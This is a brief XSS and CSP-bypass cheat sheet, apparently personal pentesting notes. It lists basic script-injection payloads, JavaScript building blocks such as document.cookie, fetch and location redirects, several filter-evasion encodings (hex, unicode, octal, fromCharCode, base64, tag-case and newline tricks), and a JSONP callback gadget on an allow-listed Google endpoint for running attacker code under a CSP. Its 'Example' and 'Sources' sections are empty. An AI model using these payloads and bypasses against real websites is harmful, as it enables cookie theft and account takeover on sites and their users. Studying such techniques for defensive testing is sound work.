XSS / CSP – Gadgets

Template

<script>alert(1)</script>
<img src=x onerror=alert(1) />
<svg onload=alert('XSS')>

JS functions

btoa()   // encodes a string to base64
atob()   // decodes a base64-encoded string

document.getElementById(id)
document.getElementsByClassName(names)
document.getElementsByName(name) //for inputs

window.location.replace('<url>')
window.location.href='<url>'
document.cookie 
document['cookie']
fetch("<url>")

'hello'.concat('','world')
'hello'.slice(0,2)
`cookie : ${document.cookie}`

Filter bypass


<iMg>
<[%00]img>
\u0061lert(1)
alert`1`

"hack"
'hack'
`hack`
"\h\a\c\k\"                              // some chars are not working
"\x68\x61\x63\x6b"                       // hex
"\u0068\u0061\u0063\u006b"               // unicode
"\150\141\143\153"                       // charcode base 8
/hack/
/hack/.source
String.fromCharCode(104,97,99,107)       // charcode base 10
atob("aGFjaw==")

<script                                  // note the newline before ">"
>alert(1)</script>

Example


JSONP

A JSONP endpoint on an origin that the CSP allow-lists is a script gadget: the callback parameter is reflected into the response body as JavaScript, so a <script src> pointing at it runs attacker-chosen code from an allowed origin.

http://lun.org/page?p=<script src="https://content-customsearch.googleapis.com/customsearch/v1?q=hello&callback=<javascript>"></script>

Useful links

Sources: